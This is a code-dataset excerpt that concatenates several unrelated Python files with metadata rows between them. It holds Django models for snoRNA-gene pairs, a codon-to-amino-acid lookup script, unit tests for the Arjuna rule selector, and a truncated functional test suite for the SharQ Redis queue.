snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
# for RNA splicing
| 40.999071 | 71 | 0.731101 | 11,988 | 88,312 | 5.165082 | 0.01026 | 0.165636 | 0.229946 | 0.306594 | 0.991505 | 0.986741 | 0.986192 | 0.980636 | 0.979828 | 0.978601 | 0 | 0.030172 | 0.158948 | 88,312 | 2,153 | 72 | 41.018114 | 0.803474 | 0.003805 | 0 | 0.881002 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103862 | false | 0 | 0.001044 | 0.103862 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 10 |
30c6e53b11ee8a7f58024676e1e8edd6e674ac74 | 4,976 | py | Python | src/chain_handling.py | JanColon/Amino-Acid-Finder | 594c4f5188329e063d48cb7d243a22465a0917fe | [
"MIT"
] | null | null | null | src/chain_handling.py | JanColon/Amino-Acid-Finder | 594c4f5188329e063d48cb7d243a22465a0917fe | [
"MIT"
] | null | null | null | src/chain_handling.py | JanColon/Amino-Acid-Finder | 594c4f5188329e063d48cb7d243a22465a0917fe | [
"MIT"
] | null | null | null | from main import nc_out
import acid_combos_rna
import acid_combos_dna
purgatory = False
## Compares the user input to every array in 'acid_combos_rna.py' ##
# Also outputs the respective amino acid associated with the chain #
for i in acid_combos_rna.F:
if i == nc_out:
print("Phenylalanine")
purgatory = True
else:
pass
for i in acid_combos_rna.L:
if i == nc_out:
print("Leucine")
purgatory = True
else:
pass
for i in acid_combos_rna.I:
if i == nc_out:
print("Isoleucine")
purgatory = True
else:
pass
for i in acid_combos_rna.M:
if i == nc_out:
print("Methionine")
purgatory = True
else:
pass
for i in acid_combos_rna.V:
if i == nc_out:
print("Valine")
purgatory = True
else:
pass
for i in acid_combos_rna.S:
if i == nc_out:
print("Serine")
purgatory = True
else:
pass
for i in acid_combos_rna.P:
if i == nc_out:
print("Proline")
purgatory = True
else:
pass
for i in acid_combos_rna.T:
if i == nc_out:
print("Threonine")
purgatory = True
else:
pass
for i in acid_combos_rna.A:
if i == nc_out:
print("Alanine")
purgatory = True
else:
pass
for i in acid_combos_rna.Y:
if i == nc_out:
print("Tyrosine")
purgatory = True
else:
pass
for i in acid_combos_rna.H:
if i == nc_out:
print("Histidine")
purgatory = True
else:
pass
for i in acid_combos_rna.Q:
if i == nc_out:
print("Glutamine")
purgatory = True
else:
pass
for i in acid_combos_rna.N:
if i == nc_out:
print("Asparagine")
purgatory = True
else:
pass
for i in acid_combos_rna.K:
if i == nc_out:
print("Lysine")
purgatory = True
else:
pass
for i in acid_combos_rna.D:
if i == nc_out:
print("Aspartic acid")
purgatory = True
else:
pass
for i in acid_combos_rna.E:
if i == nc_out:
print("Glutamic acid")
purgatory = True
else:
pass
for i in acid_combos_rna.C:
if i == nc_out:
print("Cysteine")
purgatory = True
else:
pass
for i in acid_combos_rna.W:
if i == nc_out:
print("Tryptophan")
purgatory = True
else:
pass
for i in acid_combos_rna.R:
if i == nc_out:
print("Arginine")
purgatory = True
else:
pass
for i in acid_combos_rna.G:
if i == nc_out:
print("Glycine")
purgatory = True
else:
pass
for i in acid_combos_rna.STP:
if i == nc_out:
print("Termination")
purgatory = True
else:
pass
for i in acid_combos_rna.STR:
if i == nc_out:
print("Initiation")
purgatory = True
else:
pass
### DNA Nucleotide Check ###
for i in acid_combos_dna.F:
if i == nc_out:
print("Phenylalanine")
purgatory = True
else:
pass
for i in acid_combos_dna.L:
if i == nc_out:
print("Leucine")
purgatory = True
else:
pass
for i in acid_combos_dna.S:
if i == nc_out:
print("Serine")
purgatory = True
else:
pass
for i in acid_combos_dna.Y:
if i == nc_out:
print("Tyrosine")
purgatory = True
else:
pass
for i in acid_combos_dna.C:
if i == nc_out:
print("Cysteine")
purgatory = True
else:
pass
for i in acid_combos_dna.W:
if i == nc_out:
print("Tryptophan")
purgatory = True
else:
pass
for i in acid_combos_dna.P:
if i == nc_out:
print("Proline")
purgatory = True
else:
pass
for i in acid_combos_dna.H:
if i == nc_out:
print("Histidine")
purgatory = True
else:
pass
for i in acid_combos_dna.Q:
if i == nc_out:
print("Glutamine")
purgatory = True
else:
pass
for i in acid_combos_dna.R:
if i == nc_out:
print("Arginine")
purgatory = True
else:
pass
for i in acid_combos_dna.I:
if i == nc_out:
print("Isoleucine")
purgatory = True
else:
pass
for i in acid_combos_dna.M:
if i == nc_out:
print("Methionine")
purgatory = True
else:
pass
for i in acid_combos_dna.T:
if i == nc_out:
print("Threonine")
purgatory = True
else:
pass
for i in acid_combos_dna.N:
if i == nc_out:
print("Asparagine")
purgatory = True
else:
pass
for i in acid_combos_dna.K:
if i == nc_out:
print("Lysine")
purgatory = True
else:
pass
for i in acid_combos_dna.V:
if i == nc_out:
print("Valine")
purgatory = True
else:
pass
for i in acid_combos_dna.A:
if i == nc_out:
print("Alanine")
purgatory = True
else:
pass
for i in acid_combos_dna.D:
if i == nc_out:
print("Aspartic acid")
purgatory = True
else:
pass
for i in acid_combos_dna.E:
if i == nc_out:
print("Glutamic acid")
purgatory = True
else:
pass
for i in acid_combos_dna.G:
if i == nc_out:
print("Glycine")
purgatory = True
else:
pass
for i in acid_combos_dna.STR:
if i == nc_out:
print("Initiation")
purgatory = True
else:
pass
for i in acid_combos_dna.STP:
if i == nc_out:
print("Termination")
purgatory = True
else:
pass
## Prevents program from closing ##
while purgatory == True:
input()
| 17.64539 | 70 | 0.634043 | 800 | 4,976 | 3.77 | 0.10375 | 0.155836 | 0.179045 | 0.145889 | 0.919761 | 0.919761 | 0.907162 | 0.907162 | 0.907162 | 0.907162 | 0 | 0 | 0.263666 | 4,976 | 281 | 71 | 17.708185 | 0.823144 | 0.036576 | 0 | 0.814815 | 0 | 0 | 0.087653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.162963 | 0.011111 | 0 | 0.011111 | 0.162963 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
30e28a7485a91aa99124d2530d0467762fb54455 | 9,326 | py | Python | arjuna-samples/arjex/test/pkg/rules/check_rules_05_app_ver.py | StefanIGit/arjuna | 6c7d9099e0d766e7b30936ef25d32c1414133b96 | [
"Apache-2.0"
] | 13 | 2020-05-12T06:32:51.000Z | 2022-01-24T18:21:19.000Z | arjuna-samples/arjex/test/pkg/rules/check_rules_05_app_ver.py | StefanIGit/arjuna | 6c7d9099e0d766e7b30936ef25d32c1414133b96 | [
"Apache-2.0"
] | 5 | 2020-02-14T12:51:07.000Z | 2021-12-01T10:39:51.000Z | arjuna-samples/arjex/test/pkg/rules/check_rules_05_app_ver.py | StefanIGit/arjuna | 6c7d9099e0d766e7b30936ef25d32c1414133b96 | [
"Apache-2.0"
] | 25 | 2020-01-16T10:44:25.000Z | 2022-02-24T13:22:22.000Z | # This file is a part of Arjuna
# Copyright 2015-2021 Rahul Verma
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna import *
from arjuna.engine.selection.selector import Selector
from arjuna.core.constant import *
from .helpers import *
@test
def check_rule_creation_str_prop_comp(request):
r = "app_version is 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'are_equal'
r = "app_version eq 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'are_equal'
r = "app_version = 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'are_equal'
r = "app_version == 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'are_equal'
r = "app_version not 2.1.2"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.NOT_EQUAL
assert rule.expression == "2.1.2"
assert rule.checker.__name__ == 'are_not_equal'
r = "app_version != 2.1.2"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.NOT_EQUAL
assert rule.expression == "2.1.2"
assert rule.checker.__name__ == 'are_not_equal'
r = "app_version ne 2.1.2"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.NOT_EQUAL
assert rule.expression == "2.1.2"
assert rule.checker.__name__ == 'are_not_equal'
r = "app_version lt 2.1.2"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.LESS_THAN
assert rule.expression == "2.1.2"
assert rule.checker.__name__ == 'less_than'
r = "app_version < 2.1.2"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.LESS_THAN
assert rule.expression == "2.1.2"
assert rule.checker.__name__ == 'less_than'
r = "app_version gt 2.1.0"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.GREATER_THAN
assert rule.expression == "2.1.0"
assert rule.checker.__name__ == 'greater_than'
r = "app_version > 2.1.0"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.GREATER_THAN
assert rule.expression == "2.1.0"
assert rule.checker.__name__ == 'greater_than'
r = "app_version le 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.LESS_OR_EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'less_or_equal'
r = "app_version <= 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.LESS_OR_EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'less_or_equal'
r = "app_version ge 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.GREATER_OR_EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'greater_or_equal'
r = "app_version >= 2.1.1"
selector = Selector()
selector.include(r)
rule = selector.irules[0]
print(rule)
assert rule.__class__.__name__ == "AttrPatternRule"
assert rule.rule_str == r
assert rule.container == "info"
assert rule.target == "app_version"
assert rule.condition == RuleConditionType.GREATER_OR_EQUAL
assert rule.expression == "2.1.1"
assert rule.checker.__name__ == 'greater_or_equal'
@test
def check_str_comp_selection(request):
rule = get_rule("app_version is 2.1.1")
obj = Obj()
assert rule.matches(obj) is False
obj = Obj()
obj.info.app_version = "2.1.1"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is False
rule = get_rule("app_version not 2.1.2")
obj = Obj()
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.1"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is False
rule = get_rule("app_version lt 2.1.2")
obj = Obj()
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.3"
assert rule.matches(obj) is False
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is False
rule = get_rule("app_version gt 2.1.2")
obj = Obj()
assert rule.matches(obj) is False
obj = Obj()
obj.info.app_version = "2.1.3"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is False
rule = get_rule("app_version le 2.1.2")
obj = Obj()
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.1"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.3"
assert rule.matches(obj) is False
rule = get_rule("app_version ge 2.1.2")
obj = Obj()
assert rule.matches(obj) is False
obj = Obj()
obj.info.app_version = "2.1.3"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.2"
assert rule.matches(obj) is True
obj = Obj()
obj.info.app_version = "2.1.1"
assert rule.matches(obj) is False
| 30.477124 | 74 | 0.663092 | 1,273 | 9,326 | 4.625295 | 0.094266 | 0.212296 | 0.0107 | 0.042799 | 0.884681 | 0.880774 | 0.873641 | 0.873641 | 0.873641 | 0.873641 | 0 | 0.024223 | 0.216492 | 9,326 | 305 | 75 | 30.577049 | 0.781579 | 0.065301 | 0 | 0.891129 | 0 | 0 | 0.136667 | 0 | 0 | 0 | 0 | 0 | 0.504032 | 1 | 0.008065 | false | 0 | 0.016129 | 0 | 0.024194 | 0.060484 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
30ff005ddcfe234b885e2747e4cda081d6c725e4 | 73,852 | py | Python | tests/test_func.py | bhuvanvenkat-plivo/sharq | 32bbfbdcbbaa8e154271ffd125ac4500382f3d19 | [
"MIT"
] | 8 | 2015-08-18T11:04:50.000Z | 2021-11-24T09:55:59.000Z | tests/test_func.py | bhuvanvenkat-plivo/sharq | 32bbfbdcbbaa8e154271ffd125ac4500382f3d19 | [
"MIT"
] | 1 | 2015-01-13T14:21:53.000Z | 2015-01-27T14:14:26.000Z | tests/test_func.py | bhuvanvenkat-plivo/sharq | 32bbfbdcbbaa8e154271ffd125ac4500382f3d19 | [
"MIT"
] | 13 | 2015-09-24T16:20:16.000Z | 2020-11-12T10:16:13.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2014 Plivo Team. See LICENSE.txt for details.
import os
import uuid
import time
import math
import unittest
import msgpack
from sharq import SharQ
from sharq.utils import generate_epoch
class SharQTestCase(unittest.TestCase):
"""
`SharQTestCase` contains the functional test cases
that validate the correctness of all the APIs exposed
by SharQ.
"""
def setUp(self):
cwd = os.path.dirname(os.path.realpath(__file__))
config_path = os.path.join(cwd, 'sharq.test.conf') # test config
self.queue = SharQ(config_path)
# flush all the keys in the test db before starting test
self.queue._r.flushdb()
# test specific values
self._test_queue_id = 'johndoe'
self._test_queue_type = 'sms'
self._test_payload_1 = {
'to': '1000000000',
'message': 'Hello, world'
}
self._test_payload_2 = {
'to': '1000000001',
'message': 'Hello, SharQ'
}
self._test_requeue_limit_5 = 5
self._test_requeue_limit_neg_1 = -1
self._test_requeue_limit_0 = 0
self._test2_queue_id = 'thetourist'
self._test2_queue_type = 'package'
def _get_job_id(self):
"""Generates a uuid4 and returns the string
representation of it.
"""
return str(uuid.uuid4())
def test_enqueue_response_status(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
self.assertEqual(response['status'], 'queued')
def test_enqueue_job_queue_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if the job queue exists
queue_name = '%s:%s:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id
)
self.assertTrue(self.queue._r.exists(queue_name))
def test_enqueue_job_existence_in_job_queue(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if the queue contains the job we just pushed (by peeking)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id
)
latest_job_id = self.queue._r.lrange(queue_name, -1, -1)
self.assertEqual(latest_job_id, [job_id])
def test_enqueue_job_queue_length(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if the queue length is one
queue_name = '%s:%s:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id
)
queue_length = self.queue._r.llen(queue_name)
self.assertEqual(queue_length, 1)
def test_enqueue_payload_dump(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if the payload is saved in the appropriate structure
payload_map_name = '%s:payload' % (self.queue._key_prefix)
# check if the payload map exists
self.assertTrue(self.queue._r.exists(payload_map_name))
def test_enqueue_payload_encode_decode(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
payload_map_name = '%s:payload' % (self.queue._key_prefix)
payload_map_key = '%s:%s:%s' % (
self._test_queue_type, self._test_queue_id, job_id)
raw_payload = self.queue._r.hget(payload_map_name, payload_map_key)
# decode the payload from msgpack to dictionary
payload = msgpack.unpackb(raw_payload[1:-1])
self.assertEqual(payload, self._test_payload_1)
def test_enqueue_interval_map_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
def test_enqueue_interval_value(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(
interval_map_name, interval_map_key)
self.assertEqual(interval, '10000') # 10s (10000ms)
def test_enqueue_requeue_limit_map_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
# without a requeue limit parameter
)
# check if requeue limit is saved in the appropriate structure
requeue_limit_map_name = '%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
)
# check if requeue limit map exists
self.assertTrue(self.queue._r.exists(requeue_limit_map_name))
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# check if requeue limit is saved in the appropriate structure
requeue_limit_map_name = '%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
)
# check if requeue limit map exists
self.assertTrue(self.queue._r.exists(requeue_limit_map_name))
def test_enqueue_requeue_limit_value(self):
# without requeue limit (but reading from the config)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
# without requeue limit.
)
# check if requeue limit is saved in the appropriate structure
requeue_limit_map_name = '%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
)
requeues_remaining = self.queue._r.hget(
requeue_limit_map_name, job_id)
self.assertEqual(requeues_remaining, '-1') # from the config file.
# with requeue limit in the enqueue function.
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# check if requeue limit is saved in the appropriate structure
requeue_limit_map_name = '%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
)
requeues_remaining = self.queue._r.hget(
requeue_limit_map_name, job_id)
self.assertEqual(requeues_remaining, '5') # 5 retries remaining.
def test_enqueue_ready_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
self.assertTrue(self.queue._r.exists(sorted_set_name))
def test_enqueue_ready_set_contents(self):
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
end_time = str(generate_epoch())
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
queue_id_list = self.queue._r.zrangebyscore(
sorted_set_name,
start_time,
end_time)
# check if exactly one item in the list
self.assertEqual(len(queue_id_list), 1)
# check the value to match the queue_id
self.assertEqual(queue_id_list[0], self._test_queue_id)
def test_enqueue_queue_type_ready_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check the queue type ready set.
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_enqueue_queue_type_active_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_type_ready_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_enqueue_metrics_global_enqueue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:enqueue_counter:%s' % (
self.queue._key_prefix, timestamp_minute))
self.assertEqual(counter_value, '1')
def test_enqueue_metrics_per_queue_enqueue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:%s:%s:enqueue_counter:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
timestamp_minute))
self.assertEqual(counter_value, '1')
def test_enqueue_second_job_status(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
self.assertEqual(response['status'], 'queued')
def test_enqueue_second_job_queue_existence(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)
self.assertTrue(self.queue._r.exists(queue_name))
def test_enqueue_second_job_existence_in_job_queue(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)
latest_job_id = self.queue._r.lrange(queue_name, -1, -1)
self.assertEqual(latest_job_id, [job_id])
def test_enqueue_second_job_queue_length(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
